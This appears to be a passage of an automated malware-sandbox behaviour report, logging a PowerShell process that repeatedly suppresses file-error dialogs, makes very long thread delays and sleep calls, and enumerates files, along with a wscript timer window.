    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5085Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4719Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 1761Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1325Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 603Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3447Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 400Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 855
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 622
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep count: 5085 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 4719 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1512Thread sleep time: -14757395258967632s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172Thread sleep count: 1325 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172Thread sleep count: 603 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3004Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep count: 3447 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep count: 400 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 712Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep count: 855 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5864Thread sleep count: 622 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
